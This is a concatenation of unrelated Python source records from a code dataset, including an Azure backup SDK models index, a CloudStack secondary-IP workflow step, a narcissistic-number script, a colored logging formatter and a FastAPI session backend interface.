from ._models_py3 import AzureVmWorkloadProtectedItemExtendedInfo
from ._models_py3 import AzureVmWorkloadProtectionPolicy
from ._models_py3 import AzureVmWorkloadSAPAseDatabaseProtectedItem
from ._models_py3 import AzureVmWorkloadSAPAseDatabaseWorkloadItem
from ._models_py3 import AzureVmWorkloadSAPAseSystemProtectableItem
from ._models_py3 import AzureVmWorkloadSAPAseSystemWorkloadItem
from ._models_py3 import AzureVmWorkloadSAPHanaDatabaseProtectableItem
from ._models_py3 import AzureVmWorkloadSAPHanaDatabaseProtectedItem
from ._models_py3 import AzureVmWorkloadSAPHanaDatabaseWorkloadItem
from ._models_py3 import AzureVmWorkloadSAPHanaSystemProtectableItem
from ._models_py3 import AzureVmWorkloadSAPHanaSystemWorkloadItem
from ._models_py3 import AzureVmWorkloadSQLAvailabilityGroupProtectableItem
from ._models_py3 import AzureVmWorkloadSQLDatabaseProtectableItem
from ._models_py3 import AzureVmWorkloadSQLDatabaseProtectedItem
from ._models_py3 import AzureVmWorkloadSQLDatabaseWorkloadItem
from ._models_py3 import AzureVmWorkloadSQLInstanceProtectableItem
from ._models_py3 import AzureVmWorkloadSQLInstanceWorkloadItem
from ._models_py3 import AzureWorkloadAutoProtectionIntent
from ._models_py3 import AzureWorkloadBackupRequest
from ._models_py3 import AzureWorkloadContainer
from ._models_py3 import AzureWorkloadContainerAutoProtectionIntent
from ._models_py3 import AzureWorkloadContainerExtendedInfo
from ._models_py3 import AzureWorkloadErrorInfo
from ._models_py3 import AzureWorkloadJob
from ._models_py3 import AzureWorkloadJobExtendedInfo
from ._models_py3 import AzureWorkloadJobTaskDetails
from ._models_py3 import AzureWorkloadPointInTimeRecoveryPoint
from ._models_py3 import AzureWorkloadPointInTimeRestoreRequest
from ._models_py3 import AzureWorkloadRecoveryPoint
from ._models_py3 import AzureWorkloadRestoreRequest
from ._models_py3 import AzureWorkloadSAPHanaPointInTimeRecoveryPoint
from ._models_py3 import AzureWorkloadSAPHanaPointInTimeRestoreRequest
from ._models_py3 import AzureWorkloadSAPHanaPointInTimeRestoreWithRehydrateRequest
from ._models_py3 import AzureWorkloadSAPHanaRecoveryPoint
from ._models_py3 import AzureWorkloadSAPHanaRestoreRequest
from ._models_py3 import AzureWorkloadSAPHanaRestoreWithRehydrateRequest
from ._models_py3 import AzureWorkloadSQLAutoProtectionIntent
from ._models_py3 import AzureWorkloadSQLPointInTimeRecoveryPoint
from ._models_py3 import AzureWorkloadSQLPointInTimeRestoreRequest
from ._models_py3 import AzureWorkloadSQLPointInTimeRestoreWithRehydrateRequest
from ._models_py3 import AzureWorkloadSQLRecoveryPoint
from ._models_py3 import AzureWorkloadSQLRecoveryPointExtendedInfo
from ._models_py3 import AzureWorkloadSQLRestoreRequest
from ._models_py3 import AzureWorkloadSQLRestoreWithRehydrateRequest
from ._models_py3 import BEKDetails
from ._models_py3 import BMSBackupEngineQueryObject
from ._models_py3 import BMSBackupEnginesQueryObject
from ._models_py3 import BMSBackupSummariesQueryObject
from ._models_py3 import BMSContainerQueryObject
from ._models_py3 import BMSContainersInquiryQueryObject
from ._models_py3 import BMSPOQueryObject
from ._models_py3 import BMSRPQueryObject
from ._models_py3 import BMSRefreshContainersQueryObject
from ._models_py3 import BMSWorkloadItemQueryObject
from ._models_py3 import BackupEngineBase
from ._models_py3 import BackupEngineBaseResource
from ._models_py3 import BackupEngineBaseResourceList
from ._models_py3 import BackupEngineExtendedInfo
from ._models_py3 import BackupManagementUsage
from ._models_py3 import BackupManagementUsageList
from ._models_py3 import BackupRequest
from ._models_py3 import BackupRequestResource
from ._models_py3 import BackupResourceConfig
from ._models_py3 import BackupResourceConfigResource
from ._models_py3 import BackupResourceEncryptionConfig
from ._models_py3 import BackupResourceEncryptionConfigExtended
from ._models_py3 import BackupResourceEncryptionConfigExtendedResource
from ._models_py3 import BackupResourceEncryptionConfigResource
from ._models_py3 import BackupResourceVaultConfig
from ._models_py3 import BackupResourceVaultConfigResource
from ._models_py3 import BackupStatusRequest
from ._models_py3 import BackupStatusResponse
from ._models_py3 import ClientDiscoveryDisplay
from ._models_py3 import ClientDiscoveryForLogSpecification
from ._models_py3 import ClientDiscoveryForProperties
from ._models_py3 import ClientDiscoveryForServiceSpecification
from ._models_py3 import ClientDiscoveryResponse
from ._models_py3 import ClientDiscoveryValueForSingleApi
from ._models_py3 import ClientScriptForConnect
from ._models_py3 import CloudErrorBody
from ._models_py3 import ContainerIdentityInfo
from ._models_py3 import DPMContainerExtendedInfo
from ._models_py3 import DPMProtectedItem
from ._models_py3 import DPMProtectedItemExtendedInfo
from ._models_py3 import DailyRetentionFormat
from ._models_py3 import DailyRetentionSchedule
from ._models_py3 import DailySchedule
from ._models_py3 import Day
from ._models_py3 import DiskExclusionProperties
from ._models_py3 import DiskInformation
from ._models_py3 import DistributedNodesInfo
from ._models_py3 import DpmBackupEngine
from ._models_py3 import DpmContainer
from ._models_py3 import DpmErrorInfo
from ._models_py3 import DpmJob
from ._models_py3 import DpmJobExtendedInfo
from ._models_py3 import DpmJobTaskDetails
from ._models_py3 import EncryptionDetails
from ._models_py3 import ErrorAdditionalInfo
from ._models_py3 import ErrorDetail
from ._models_py3 import ExportJobsOperationResultInfo
from ._models_py3 import ExtendedProperties
from ._models_py3 import FeatureSupportRequest
from ._models_py3 import GenericContainer
from ._models_py3 import GenericContainerExtendedInfo
from ._models_py3 import GenericProtectedItem
from ._models_py3 import GenericProtectionPolicy
from ._models_py3 import GenericRecoveryPoint
from ._models_py3 import GetProtectedItemQueryObject
from ._models_py3 import HourlySchedule
from ._models_py3 import ILRRequest
from ._models_py3 import ILRRequestResource
from ._models_py3 import IaaSVMContainer
from ._models_py3 import IaaSVMProtectableItem
from ._models_py3 import IaasVMBackupRequest
from ._models_py3 import IaasVMILRRegistrationRequest
from ._models_py3 import IaasVMRecoveryPoint
from ._models_py3 import IaasVMRestoreRequest
from ._models_py3 import IaasVMRestoreWithRehydrationRequest
from ._models_py3 import IdentityBasedRestoreDetails
from ._models_py3 import IdentityInfo
from ._models_py3 import InquiryInfo
from ._models_py3 import InquiryValidation
from ._models_py3 import InstantItemRecoveryTarget
from ._models_py3 import InstantRPAdditionalDetails
from ._models_py3 import Job
from ._models_py3 import JobQueryObject
from ._models_py3 import JobResource
from ._models_py3 import JobResourceList
from ._models_py3 import KEKDetails
from ._models_py3 import KPIResourceHealthDetails
from ._models_py3 import KeyAndSecretDetails
from ._models_py3 import ListRecoveryPointsRecommendedForMoveRequest
from ._models_py3 import LogSchedulePolicy
from ._models_py3 import LongTermRetentionPolicy
from ._models_py3 import LongTermSchedulePolicy
from ._models_py3 import MABContainerHealthDetails
from ._models_py3 import MabContainer
from ._models_py3 import MabContainerExtendedInfo
from ._models_py3 import MabErrorInfo
from ._models_py3 import MabFileFolderProtectedItem
from ._models_py3 import MabFileFolderProtectedItemExtendedInfo
from ._models_py3 import MabJob
from ._models_py3 import MabJobExtendedInfo
from ._models_py3 import MabJobTaskDetails
from ._models_py3 import MabProtectionPolicy
from ._models_py3 import MonthlyRetentionSchedule
from ._models_py3 import MoveRPAcrossTiersRequest
from ._models_py3 import NameInfo
from ._models_py3 import NewErrorResponse
from ._models_py3 import NewErrorResponseError
from ._models_py3 import OperationResultInfo
from ._models_py3 import OperationResultInfoBase
from ._models_py3 import OperationResultInfoBaseResource
from ._models_py3 import OperationStatus
from ._models_py3 import OperationStatusError
from ._models_py3 import OperationStatusExtendedInfo
from ._models_py3 import OperationStatusJobExtendedInfo
from ._models_py3 import OperationStatusJobsExtendedInfo
from ._models_py3 import OperationStatusProvisionILRExtendedInfo
from ._models_py3 import OperationStatusValidateOperationExtendedInfo
from ._models_py3 import OperationWorkerResponse
from ._models_py3 import PointInTimeRange
from ._models_py3 import PreBackupValidation
from ._models_py3 import PreValidateEnableBackupRequest
from ._models_py3 import PreValidateEnableBackupResponse
from ._models_py3 import PrepareDataMoveRequest
from ._models_py3 import PrepareDataMoveResponse
from ._models_py3 import PrivateEndpoint
from ._models_py3 import PrivateEndpointConnection
from ._models_py3 import PrivateEndpointConnectionResource
from ._models_py3 import PrivateLinkServiceConnectionState
from ._models_py3 import ProtectableContainer
from ._models_py3 import ProtectableContainerResource
from ._models_py3 import ProtectableContainerResourceList
from ._models_py3 import ProtectedItem
from ._models_py3 import ProtectedItemQueryObject
from ._models_py3 import ProtectedItemResource
from ._models_py3 import ProtectedItemResourceList
from ._models_py3 import ProtectionContainer
from ._models_py3 import ProtectionContainerResource
from ._models_py3 import ProtectionContainerResourceList
from ._models_py3 import ProtectionIntent
from ._models_py3 import ProtectionIntentQueryObject
from ._models_py3 import ProtectionIntentResource
from ._models_py3 import ProtectionIntentResourceList
from ._models_py3 import ProtectionPolicy
from ._models_py3 import ProtectionPolicyQueryObject
from ._models_py3 import ProtectionPolicyResource
from ._models_py3 import ProtectionPolicyResourceList
from ._models_py3 import RecoveryPoint
from ._models_py3 import RecoveryPointDiskConfiguration
from ._models_py3 import RecoveryPointMoveReadinessInfo
from ._models_py3 import RecoveryPointRehydrationInfo
from ._models_py3 import RecoveryPointResource
from ._models_py3 import RecoveryPointResourceList
from ._models_py3 import RecoveryPointTierInformation
from ._models_py3 import RecoveryPointTierInformationV2
from ._models_py3 import Resource
from ._models_py3 import ResourceGuardOperationDetail
from ._models_py3 import ResourceGuardProxyBase
from ._models_py3 import ResourceGuardProxyBaseResource
from ._models_py3 import ResourceGuardProxyBaseResourceList
from ._models_py3 import ResourceHealthDetails
from ._models_py3 import ResourceList
from ._models_py3 import RestoreFileSpecs
from ._models_py3 import RestoreRequest
from ._models_py3 import RestoreRequestResource
from ._models_py3 import RetentionDuration
from ._models_py3 import RetentionPolicy
from ._models_py3 import SQLDataDirectory
from ._models_py3 import SQLDataDirectoryMapping
from ._models_py3 import SchedulePolicy
from ._models_py3 import SecurityPinBase
from ._models_py3 import Settings
from ._models_py3 import SimpleRetentionPolicy
from ._models_py3 import SimpleSchedulePolicy
from ._models_py3 import SimpleSchedulePolicyV2
from ._models_py3 import SubProtectionPolicy
from ._models_py3 import TargetAFSRestoreInfo
from ._models_py3 import TargetRestoreInfo
from ._models_py3 import TieringPolicy
from ._models_py3 import TokenInformation
from ._models_py3 import TriggerDataMoveRequest
from ._models_py3 import UnlockDeleteRequest
from ._models_py3 import UnlockDeleteResponse
from ._models_py3 import ValidateIaasVMRestoreOperationRequest
from ._models_py3 import ValidateOperationRequest
from ._models_py3 import ValidateOperationResponse
from ._models_py3 import ValidateOperationsResponse
from ._models_py3 import ValidateRestoreOperationRequest
from ._models_py3 import VaultJob
from ._models_py3 import VaultJobErrorInfo
from ._models_py3 import VaultJobExtendedInfo
from ._models_py3 import VaultStorageConfigOperationResultResponse
from ._models_py3 import WeeklyRetentionFormat
from ._models_py3 import WeeklyRetentionSchedule
from ._models_py3 import WeeklySchedule
from ._models_py3 import WorkloadInquiryDetails
from ._models_py3 import WorkloadItem
from ._models_py3 import WorkloadItemResource
from ._models_py3 import WorkloadItemResourceList
from ._models_py3 import WorkloadProtectableItem
from ._models_py3 import WorkloadProtectableItemResource
from ._models_py3 import WorkloadProtectableItemResourceList
from ._models_py3 import YearlyRetentionSchedule
from ._recovery_services_backup_client_enums import (
AcquireStorageAccountLock,
AzureFileShareType,
BackupEngineType,
BackupItemType,
BackupManagementType,
BackupType,
ContainerType,
CopyOptions,
CreateMode,
DataMoveLevel,
DataSourceType,
DayOfWeek,
DedupState,
EncryptionAtRestType,
EnhancedSecurityState,
FabricName,
HealthState,
HealthStatus,
HttpStatusCode,
IAASVMPolicyType,
InfrastructureEncryptionState,
InquiryStatus,
IntentItemType,
JobOperationType,
JobStatus,
JobSupportedAction,
LastBackupStatus,
LastUpdateStatus,
MabServerType,
MonthOfYear,
OperationStatusValues,
OperationType,
OverwriteOptions,
PolicyType,
PrivateEndpointConnectionStatus,
ProtectedItemHealthStatus,
ProtectedItemState,
ProtectionIntentItemType,
ProtectionState,
ProtectionStatus,
ProvisioningState,
RecoveryMode,
RecoveryPointTierStatus,
RecoveryPointTierType,
RecoveryType,
RehydrationPriority,
ResourceHealthStatus,
RestorePointQueryType,
RestorePointType,
RestoreRequestType,
RetentionDurationType,
RetentionScheduleFormat,
SQLDataDirectoryType,
ScheduleRunType,
SoftDeleteFeatureState,
StorageType,
StorageTypeState,
SupportStatus,
TieringMode,
Type,
UsagesUnit,
ValidationStatus,
WeekOfMonth,
WorkloadItemType,
WorkloadType,
XcoolState,
)
__all__ = [
'AzureBackupGoalFeatureSupportRequest',
'AzureBackupServerContainer',
'AzureBackupServerEngine',
'AzureFileShareBackupRequest',
'AzureFileShareProtectableItem',
'AzureFileShareProtectionPolicy',
'AzureFileShareProvisionILRRequest',
'AzureFileShareRecoveryPoint',
'AzureFileShareRestoreRequest',
'AzureFileshareProtectedItem',
'AzureFileshareProtectedItemExtendedInfo',
'AzureIaaSClassicComputeVMContainer',
'AzureIaaSClassicComputeVMProtectableItem',
'AzureIaaSClassicComputeVMProtectedItem',
'AzureIaaSComputeVMContainer',
'AzureIaaSComputeVMProtectableItem',
'AzureIaaSComputeVMProtectedItem',
'AzureIaaSVMErrorInfo',
'AzureIaaSVMHealthDetails',
'AzureIaaSVMJob',
'AzureIaaSVMJobExtendedInfo',
'AzureIaaSVMJobTaskDetails',
'AzureIaaSVMJobV2',
'AzureIaaSVMProtectedItem',
'AzureIaaSVMProtectedItemExtendedInfo',
'AzureIaaSVMProtectionPolicy',
'AzureRecoveryServiceVaultProtectionIntent',
'AzureResourceProtectionIntent',
'AzureSQLAGWorkloadContainerProtectionContainer',
'AzureSqlContainer',
'AzureSqlProtectedItem',
'AzureSqlProtectedItemExtendedInfo',
'AzureSqlProtectionPolicy',
'AzureStorageContainer',
'AzureStorageErrorInfo',
'AzureStorageJob',
'AzureStorageJobExtendedInfo',
'AzureStorageJobTaskDetails',
'AzureStorageProtectableContainer',
'AzureVMAppContainerProtectableContainer',
'AzureVMAppContainerProtectionContainer',
'AzureVMResourceFeatureSupportRequest',
'AzureVMResourceFeatureSupportResponse',
'AzureVmWorkloadItem',
'AzureVmWorkloadProtectableItem',
'AzureVmWorkloadProtectedItem',
'AzureVmWorkloadProtectedItemExtendedInfo',
'AzureVmWorkloadProtectionPolicy',
'AzureVmWorkloadSAPAseDatabaseProtectedItem',
'AzureVmWorkloadSAPAseDatabaseWorkloadItem',
'AzureVmWorkloadSAPAseSystemProtectableItem',
'AzureVmWorkloadSAPAseSystemWorkloadItem',
'AzureVmWorkloadSAPHanaDatabaseProtectableItem',
'AzureVmWorkloadSAPHanaDatabaseProtectedItem',
'AzureVmWorkloadSAPHanaDatabaseWorkloadItem',
'AzureVmWorkloadSAPHanaSystemProtectableItem',
'AzureVmWorkloadSAPHanaSystemWorkloadItem',
'AzureVmWorkloadSQLAvailabilityGroupProtectableItem',
'AzureVmWorkloadSQLDatabaseProtectableItem',
'AzureVmWorkloadSQLDatabaseProtectedItem',
'AzureVmWorkloadSQLDatabaseWorkloadItem',
'AzureVmWorkloadSQLInstanceProtectableItem',
'AzureVmWorkloadSQLInstanceWorkloadItem',
'AzureWorkloadAutoProtectionIntent',
'AzureWorkloadBackupRequest',
'AzureWorkloadContainer',
'AzureWorkloadContainerAutoProtectionIntent',
'AzureWorkloadContainerExtendedInfo',
'AzureWorkloadErrorInfo',
'AzureWorkloadJob',
'AzureWorkloadJobExtendedInfo',
'AzureWorkloadJobTaskDetails',
'AzureWorkloadPointInTimeRecoveryPoint',
'AzureWorkloadPointInTimeRestoreRequest',
'AzureWorkloadRecoveryPoint',
'AzureWorkloadRestoreRequest',
'AzureWorkloadSAPHanaPointInTimeRecoveryPoint',
'AzureWorkloadSAPHanaPointInTimeRestoreRequest',
'AzureWorkloadSAPHanaPointInTimeRestoreWithRehydrateRequest',
'AzureWorkloadSAPHanaRecoveryPoint',
'AzureWorkloadSAPHanaRestoreRequest',
'AzureWorkloadSAPHanaRestoreWithRehydrateRequest',
'AzureWorkloadSQLAutoProtectionIntent',
'AzureWorkloadSQLPointInTimeRecoveryPoint',
'AzureWorkloadSQLPointInTimeRestoreRequest',
'AzureWorkloadSQLPointInTimeRestoreWithRehydrateRequest',
'AzureWorkloadSQLRecoveryPoint',
'AzureWorkloadSQLRecoveryPointExtendedInfo',
'AzureWorkloadSQLRestoreRequest',
'AzureWorkloadSQLRestoreWithRehydrateRequest',
'BEKDetails',
'BMSBackupEngineQueryObject',
'BMSBackupEnginesQueryObject',
'BMSBackupSummariesQueryObject',
'BMSContainerQueryObject',
'BMSContainersInquiryQueryObject',
'BMSPOQueryObject',
'BMSRPQueryObject',
'BMSRefreshContainersQueryObject',
'BMSWorkloadItemQueryObject',
'BackupEngineBase',
'BackupEngineBaseResource',
'BackupEngineBaseResourceList',
'BackupEngineExtendedInfo',
'BackupManagementUsage',
'BackupManagementUsageList',
'BackupRequest',
'BackupRequestResource',
'BackupResourceConfig',
'BackupResourceConfigResource',
'BackupResourceEncryptionConfig',
'BackupResourceEncryptionConfigExtended',
'BackupResourceEncryptionConfigExtendedResource',
'BackupResourceEncryptionConfigResource',
'BackupResourceVaultConfig',
'BackupResourceVaultConfigResource',
'BackupStatusRequest',
'BackupStatusResponse',
'ClientDiscoveryDisplay',
'ClientDiscoveryForLogSpecification',
'ClientDiscoveryForProperties',
'ClientDiscoveryForServiceSpecification',
'ClientDiscoveryResponse',
'ClientDiscoveryValueForSingleApi',
'ClientScriptForConnect',
'CloudErrorBody',
'ContainerIdentityInfo',
'DPMContainerExtendedInfo',
'DPMProtectedItem',
'DPMProtectedItemExtendedInfo',
'DailyRetentionFormat',
'DailyRetentionSchedule',
'DailySchedule',
'Day',
'DiskExclusionProperties',
'DiskInformation',
'DistributedNodesInfo',
'DpmBackupEngine',
'DpmContainer',
'DpmErrorInfo',
'DpmJob',
'DpmJobExtendedInfo',
'DpmJobTaskDetails',
'EncryptionDetails',
'ErrorAdditionalInfo',
'ErrorDetail',
'ExportJobsOperationResultInfo',
'ExtendedProperties',
'FeatureSupportRequest',
'GenericContainer',
'GenericContainerExtendedInfo',
'GenericProtectedItem',
'GenericProtectionPolicy',
'GenericRecoveryPoint',
'GetProtectedItemQueryObject',
'HourlySchedule',
'ILRRequest',
'ILRRequestResource',
'IaaSVMContainer',
'IaaSVMProtectableItem',
'IaasVMBackupRequest',
'IaasVMILRRegistrationRequest',
'IaasVMRecoveryPoint',
'IaasVMRestoreRequest',
'IaasVMRestoreWithRehydrationRequest',
'IdentityBasedRestoreDetails',
'IdentityInfo',
'InquiryInfo',
'InquiryValidation',
'InstantItemRecoveryTarget',
'InstantRPAdditionalDetails',
'Job',
'JobQueryObject',
'JobResource',
'JobResourceList',
'KEKDetails',
'KPIResourceHealthDetails',
'KeyAndSecretDetails',
'ListRecoveryPointsRecommendedForMoveRequest',
'LogSchedulePolicy',
'LongTermRetentionPolicy',
'LongTermSchedulePolicy',
'MABContainerHealthDetails',
'MabContainer',
'MabContainerExtendedInfo',
'MabErrorInfo',
'MabFileFolderProtectedItem',
'MabFileFolderProtectedItemExtendedInfo',
'MabJob',
'MabJobExtendedInfo',
'MabJobTaskDetails',
'MabProtectionPolicy',
'MonthlyRetentionSchedule',
'MoveRPAcrossTiersRequest',
'NameInfo',
'NewErrorResponse',
'NewErrorResponseError',
'OperationResultInfo',
'OperationResultInfoBase',
'OperationResultInfoBaseResource',
'OperationStatus',
'OperationStatusError',
'OperationStatusExtendedInfo',
'OperationStatusJobExtendedInfo',
'OperationStatusJobsExtendedInfo',
'OperationStatusProvisionILRExtendedInfo',
'OperationStatusValidateOperationExtendedInfo',
'OperationWorkerResponse',
'PointInTimeRange',
'PreBackupValidation',
'PreValidateEnableBackupRequest',
'PreValidateEnableBackupResponse',
'PrepareDataMoveRequest',
'PrepareDataMoveResponse',
'PrivateEndpoint',
'PrivateEndpointConnection',
'PrivateEndpointConnectionResource',
'PrivateLinkServiceConnectionState',
'ProtectableContainer',
'ProtectableContainerResource',
'ProtectableContainerResourceList',
'ProtectedItem',
'ProtectedItemQueryObject',
'ProtectedItemResource',
'ProtectedItemResourceList',
'ProtectionContainer',
'ProtectionContainerResource',
'ProtectionContainerResourceList',
'ProtectionIntent',
'ProtectionIntentQueryObject',
'ProtectionIntentResource',
'ProtectionIntentResourceList',
'ProtectionPolicy',
'ProtectionPolicyQueryObject',
'ProtectionPolicyResource',
'ProtectionPolicyResourceList',
'RecoveryPoint',
'RecoveryPointDiskConfiguration',
'RecoveryPointMoveReadinessInfo',
'RecoveryPointRehydrationInfo',
'RecoveryPointResource',
'RecoveryPointResourceList',
'RecoveryPointTierInformation',
'RecoveryPointTierInformationV2',
'Resource',
'ResourceGuardOperationDetail',
'ResourceGuardProxyBase',
'ResourceGuardProxyBaseResource',
'ResourceGuardProxyBaseResourceList',
'ResourceHealthDetails',
'ResourceList',
'RestoreFileSpecs',
'RestoreRequest',
'RestoreRequestResource',
'RetentionDuration',
'RetentionPolicy',
'SQLDataDirectory',
'SQLDataDirectoryMapping',
'SchedulePolicy',
'SecurityPinBase',
'Settings',
'SimpleRetentionPolicy',
'SimpleSchedulePolicy',
'SimpleSchedulePolicyV2',
'SubProtectionPolicy',
'TargetAFSRestoreInfo',
'TargetRestoreInfo',
'TieringPolicy',
'TokenInformation',
'TriggerDataMoveRequest',
'UnlockDeleteRequest',
'UnlockDeleteResponse',
'ValidateIaasVMRestoreOperationRequest',
'ValidateOperationRequest',
'ValidateOperationResponse',
'ValidateOperationsResponse',
'ValidateRestoreOperationRequest',
'VaultJob',
'VaultJobErrorInfo',
'VaultJobExtendedInfo',
'VaultStorageConfigOperationResultResponse',
'WeeklyRetentionFormat',
'WeeklyRetentionSchedule',
'WeeklySchedule',
'WorkloadInquiryDetails',
'WorkloadItem',
'WorkloadItemResource',
'WorkloadItemResourceList',
'WorkloadProtectableItem',
'WorkloadProtectableItemResource',
'WorkloadProtectableItemResourceList',
'YearlyRetentionSchedule',
'AcquireStorageAccountLock',
'AzureFileShareType',
'BackupEngineType',
'BackupItemType',
'BackupManagementType',
'BackupType',
'ContainerType',
'CopyOptions',
'CreateMode',
'DataMoveLevel',
'DataSourceType',
'DayOfWeek',
'DedupState',
'EncryptionAtRestType',
'EnhancedSecurityState',
'FabricName',
'HealthState',
'HealthStatus',
'HttpStatusCode',
'IAASVMPolicyType',
'InfrastructureEncryptionState',
'InquiryStatus',
'IntentItemType',
'JobOperationType',
'JobStatus',
'JobSupportedAction',
'LastBackupStatus',
'LastUpdateStatus',
'MabServerType',
'MonthOfYear',
'OperationStatusValues',
'OperationType',
'OverwriteOptions',
'PolicyType',
'PrivateEndpointConnectionStatus',
'ProtectedItemHealthStatus',
'ProtectedItemState',
'ProtectionIntentItemType',
'ProtectionState',
'ProtectionStatus',
'ProvisioningState',
'RecoveryMode',
'RecoveryPointTierStatus',
'RecoveryPointTierType',
'RecoveryType',
'RehydrationPriority',
'ResourceHealthStatus',
'RestorePointQueryType',
'RestorePointType',
'RestoreRequestType',
'RetentionDurationType',
'RetentionScheduleFormat',
'SQLDataDirectoryType',
'ScheduleRunType',
'SoftDeleteFeatureState',
'StorageType',
'StorageTypeState',
'SupportStatus',
'TieringMode',
'Type',
'UsagesUnit',
'ValidationStatus',
'WeekOfMonth',
'WorkloadItemType',
'WorkloadType',
'XcoolState',
]
| StarcoderdataPython |
1772542 | # -*- coding: utf-8 -*-
import logging
from dbaas_credentials.models import CredentialType
from util import get_credentials_for
from util import full_stack
from dbaas_cloudstack.models import HostAttr
from dbaas_cloudstack.models import DatabaseInfraAttr
from dbaas_cloudstack.provider import CloudStackProvider
from workflow.steps.util.base import BaseStep
from workflow.exceptions.error_codes import DBAAS_0010
LOG = logging.getLogger(__name__)
class CreateSecondaryIp(BaseStep):
def __unicode__(self):
return "Allocating secondary ips..."
def do(self, workflow_dict):
try:
if 'target_hosts' not in workflow_dict:
return False
if len(workflow_dict['target_hosts']) == 1:
return True
cs_credentials = get_credentials_for(
environment=workflow_dict['target_environment'],
credential_type=CredentialType.CLOUDSTACK)
LOG.info("Get credential fot network api...")
networkapi_credentials = get_credentials_for(
environment=workflow_dict['target_environment'],
credential_type=CredentialType.NETWORKAPI)
cs_provider = CloudStackProvider(credentials=cs_credentials,
networkapi_credentials=networkapi_credentials)
if not cs_provider:
raise Exception("Could not create CloudStackProvider object")
return False
workflow_dict['target_secondary_ips'] = []
networkapi_equipment_id = workflow_dict[
'source_secondary_ips'][0].networkapi_equipment_id
if not networkapi_equipment_id:
raise Exception("Could not register networkapi equipment")
return False
for index, host in enumerate(workflow_dict['target_hosts']):
LOG.info("Creating Secondary ips...")
host_attr = HostAttr.objects.get(host=host)
reserved_ip = cs_provider.reserve_ip(
project_id=cs_credentials.project,
vm_id=host_attr.vm_id)
if not reserved_ip:
return False
databaseinfraattr = DatabaseInfraAttr()
databaseinfraattr.ip = reserved_ip['secondary_ip']
if index == 0:
databaseinfraattr.is_write = True
ip_desc = 'Write IP'
else:
databaseinfraattr.is_write = False
ip_desc = 'Read IP'
networkapi_ip_id = cs_provider.register_networkapi_ip(equipment_id=networkapi_equipment_id,
ip=reserved_ip[
'secondary_ip'],
ip_desc=ip_desc)
databaseinfraattr.cs_ip_id = reserved_ip['cs_ip_id']
databaseinfraattr.networkapi_equipment_id = networkapi_equipment_id
databaseinfraattr.networkapi_ip_id = networkapi_ip_id
databaseinfraattr.databaseinfra = workflow_dict[
'databaseinfra']
databaseinfraattr.save()
old_ip = workflow_dict['source_secondary_ips'][index]
old_ip.equivalent_dbinfraattr = databaseinfraattr
old_ip.save()
workflow_dict['target_secondary_ips'].append(databaseinfraattr)
return True
except Exception:
traceback = full_stack()
workflow_dict['exceptions']['error_codes'].append(DBAAS_0010)
workflow_dict['exceptions']['traceback'].append(traceback)
return False
def undo(self, workflow_dict):
LOG.info("Running undo...")
try:
if 'databaseinfra' not in workflow_dict:
LOG.info(
"We could not find a databaseinfra inside the workflow_dict")
return False
source_secondary_ip_ids = [
secondary_ip.id for secondary_ip in workflow_dict['source_secondary_ips']]
databaseinfraattr = DatabaseInfraAttr.objects.filter(
databaseinfra=workflow_dict['databaseinfra'],
equivalent_dbinfraattr=None).exclude(id__in=source_secondary_ip_ids)
LOG.info("databaseinfraattr: {}".format(databaseinfraattr))
LOG.info("old infra ip: {}".format(
workflow_dict['source_secondary_ips']))
cs_credentials = get_credentials_for(
environment=workflow_dict['target_environment'],
credential_type=CredentialType.CLOUDSTACK)
networkapi_credentials = get_credentials_for(
environment=workflow_dict['target_environment'],
credential_type=CredentialType.NETWORKAPI)
cs_provider = CloudStackProvider(credentials=cs_credentials,
networkapi_credentials=networkapi_credentials)
for infra_attr in databaseinfraattr:
networkapi_equipment_id = infra_attr.networkapi_equipment_id
networkapi_ip_id = infra_attr.networkapi_ip_id
if networkapi_ip_id:
LOG.info("Removing network api IP for %s" %
networkapi_ip_id)
if not cs_provider.remove_networkapi_ip(equipment_id=networkapi_equipment_id,
ip_id=networkapi_ip_id):
return False
LOG.info("Removing secondary_ip for %s" % infra_attr.cs_ip_id)
if not cs_provider.remove_secondary_ips(infra_attr.cs_ip_id):
return False
LOG.info("Secondary ip deleted!")
infra_attr.delete()
LOG.info("Databaseinfraattr deleted!")
return True
except Exception:
traceback = full_stack()
workflow_dict['exceptions']['error_codes'].append(DBAAS_0010)
workflow_dict['exceptions']['traceback'].append(traceback)
return False
| StarcoderdataPython |
3362757 | <reponame>xiaoandx/learningCode
# 创建一个保存满足水仙花数的列表
numberList = list();
# 循环判断每个数是否满足
for number in range(100, 1000, 1):
a = number // 100;
b = (number // 10) % 10;
c = (number % 100) % 10;
if a ** 3 + b ** 3 + c ** 3 == number:
numberList.append(number);
# 按照格式输出满足的数
print("所有的3位水仙花数:", end=" ");
print(", ".join(str(i) for i in numberList));
| StarcoderdataPython |
34267 | <gh_stars>1-10
# Credits to https://stackoverflow.com/a/56944256/9470078
# I wanted a colored logger without dependencies, so here it is!
import logging
class ColoredFormatter(logging.Formatter):
grey = "\x1b[38;20m"
yellow = "\x1b[33;20m"
red = "\x1b[31;20m"
blue = "\x1b[34;20m"
bold_red = "\x1b[31;1m"
reset = "\x1b[0m"
format = "%(name)s: %(levelname)s - %(message)s"
FORMATS = {
logging.DEBUG: grey + format + reset,
logging.INFO: blue + format + reset,
logging.WARNING: yellow + format + reset,
logging.ERROR: red + format + reset,
logging.CRITICAL: bold_red + format + reset,
}
def format(self, record):
log_fmt = self.FORMATS.get(record.levelno)
formatter = logging.Formatter(log_fmt)
return formatter.format(record)
| StarcoderdataPython |
4814526 | <filename>fastapi_sessions/backends/session_backend.py<gh_stars>10-100
"""Generic backend code."""
from abc import ABC, abstractmethod
from typing import Generic, Optional, TypeVar
from fastapi_sessions.frontends.session_frontend import ID
from pydantic.main import BaseModel
SessionModel = TypeVar("SessionModel", bound=BaseModel)
class BackendError(Exception):
"""Error that is thrown by backends."""
pass
class SessionBackend(ABC, Generic[ID, SessionModel]):
"""Abstract class that defines methods for interacting with session data."""
@abstractmethod
async def create(self, session_id: ID, data: SessionModel) -> None:
"""Create a new session."""
raise NotImplementedError()
@abstractmethod
async def read(self, session_id: ID) -> Optional[SessionModel]:
"""Read session data from the storage."""
raise NotImplementedError()
@abstractmethod
async def update(self, session_id: ID, data: SessionModel) -> None:
"""Update session data to the storage"""
raise NotImplementedError()
@abstractmethod
async def delete(self, session_id: ID) -> None:
"""Remove session data from the storage."""
raise NotImplementedError()
| StarcoderdataPython |
3297232 | <reponame>vijaykumawat256/Prompt-Summarization
def two_decimal_places(n):
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.